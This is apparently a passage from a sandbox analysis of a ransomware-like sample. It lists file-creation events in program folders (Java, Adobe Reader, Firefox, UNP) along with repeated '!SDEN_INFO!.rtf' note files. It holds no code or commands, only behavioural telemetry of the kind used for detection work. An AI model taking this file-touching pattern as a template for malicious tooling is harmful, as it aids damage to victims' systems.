| Create | C:\Program Files\Java\jre1.8.0_144\bin\jabswitch.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\WindowsUpdatePrivacySetting.scale-200.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_de.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\vi-VN\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ms-MY\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\uninstall\helper.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_TW.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Back_0001_Static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\kinit.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ro-RO\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.007.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\servertool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\jfxrt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-CN\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\CIEXYZ.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.008.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\softokn3.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\rempl\Logs\Remediation.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_fr.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.bfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash@2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\WinMail.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\rempl\does.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES-valencia\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\hijrah-config-umalqura.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Security\BrowserCore\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\cs-CZ\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\javaws.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ID\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CO\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CH\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-HK\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\jmxremote.password.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\rt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\invalid32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ja-JP\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CL\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CA\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr\default.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\it-IT\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-NL\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\snmp.acl.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-BE\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\PrivacyContentWrapper.min.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\blacklisted.certs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\uninstall\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\cs-CZ\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ID\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ZA\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Lock-Confirmation-page-350.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sl-SI\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\LICENSE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CO\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fi-FI\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ms-MY\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ro-RO\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\vi-VN\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-CN\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\omni.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sk-SK\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-TW\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.020.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
